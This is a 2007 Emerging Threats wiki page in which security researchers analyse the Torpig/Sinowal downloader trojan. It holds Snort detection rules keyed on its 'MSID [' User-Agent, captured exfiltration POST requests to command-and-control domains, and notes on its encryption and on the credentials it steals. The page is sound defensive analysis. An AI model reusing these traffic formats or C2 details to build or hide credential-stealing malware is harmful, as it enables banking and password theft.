EmergingThreats> Main Web>2003590 (revision 11)EditAttach
Added 2007-06-22

Ondrej, I'm trying to decrypt head of the request. Could You explain more detailed the encryption method, especially this part with half-byte shuffling. I know xor and base64 methods :-). I saw this trojan talking to gjxuunj.com in June. Panda published a paper about this threat: link to eCrime 2007 Congress

-- DamianPetrus? - 22 Jun 2007

Added 2007-06-04

I can decrypt the URL part (after /ewDf/):

the key for decryption is inside user-agent - CEB...91D. The encryption method is based on shuffling half-bytes around the string, xoring with the key and finally base64 encoding.

I don't know how to decrypt the content of the request. But from my observations the amount of data sent corresponds to increments in file \Windows\temp\$_2341233.tmp (hidden and system). (at least for version on my computer)

-- OndrejPokorny?

Added 2007-05-27

We were able to capture this guy from a web page (drive by download). It is pushing out these on submission of form data:

Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache

Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream


Does anybody have an idea on how to get to the content of the submitted data. I already tried base64 decode...


-- ChristianSeifert? - 2007-05-27

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:2;)

Added 2007-04-23 10:49:18 UTC

I have an infected computer (for research purposes) and have seen two versions of the trojan - grey (old version), Build Vasi4 (after automatic update):

POST http://seksis1.com/XFsQa5/ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwicwF1Gm5QZixjG0UlsAo0TiBWazPwRWFnQQowcC1BpXVqFHIeYx1ycjBTFTGwBzRCJRknJ/UaMTEEWScoegbhInYEch5lF2J2R1oVMscCQEQhYCdrtnIGEkQEIHwjUaV0YXUFFmFQVx43CkA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: seksis1.com
Content-Length: 1254
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|grey|102


Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Content-Length: 607
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|Build Vasi4|104
Pragma: no-cache

The site contacted has also been jdbpebf.com, seksis1.com (both stopped) and at this moment it is vgnyarm.com (or numeric, if DNS doesn't work) The malware steals user information (IE autocomplete fields, POP3 password, bookmarks, address book, fill forms sent to internet) and also targets many, especially banking, sites.

Have you seen other IPs than Do you now anything about infection? I know site veslox.net/grey/ , but it doesn't work anymore.

-- OndrejPokorny? - 2007-04-23

Added 2007-04-16 13:15:18 UTC

'sun' in User-Agent most likely refers to the directory which the compromised host visited and was led to the downloader. For example, a directory like /ld/sun/ani.htm would lead to 'sun' being placed in the User-agent for GET check-in request. Other possible strings are 'grey', 'ment', 'guc' (though probably not all inclusive).

-- JacobKitchel? - 16 Apr 2007

This sig is working well for us. FYI, I've observed the word 'mentat' in the User-Agent following the "]|".

-- BenFeinstein - 19 Apr 2007

Thanks Ben. I bet the mentat, sun, etc are just tracking for the malware authors. It'll be interesting to see what others show up though.

-- MattJonkman - 19 Apr 2007

This is going to be a widely varied set of targets and malware. The UA comes from the initial infection which is likely jsut a loader that knows a dns name. Tracking them all is relatively futile I think. Just block the initial load with these UAs and you should contain it.


-- MattJonkman - 23 Apr 2007

The UA is from the active trojan, not from the infection. The initial infection was carried out by different means - through Internet Explorer. It is true however, that blocking communication with this UA prevents the trojan to obtain its configuration (which is vital in my case) or send data to rogue site.

My previous question about IPs and DNS names was targeting the possibility to guess how many groups are using this code.

-- OndrejPokorny? - 24 Apr 2007

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265 Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:1;)

Added 2007-04-16 13:01:18 UTC

Regyular downloader, but has an unusual UA and get string:

User-Agent: MSID [6FE60F5FFAF67AB172BAC9A0408E11FC]|sun|104
Host: xipdarm.com
Pragma: no-cache

-- MattJonkman - 16 Apr 2007

Edit | Attach | Print version | History: r12 < r11 < r10 < r9 < r8 | Backlinks | Raw View | Raw edit | More topic actions...
Topic revision: r11 - 2007-06-22 - DamianPetrus?
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats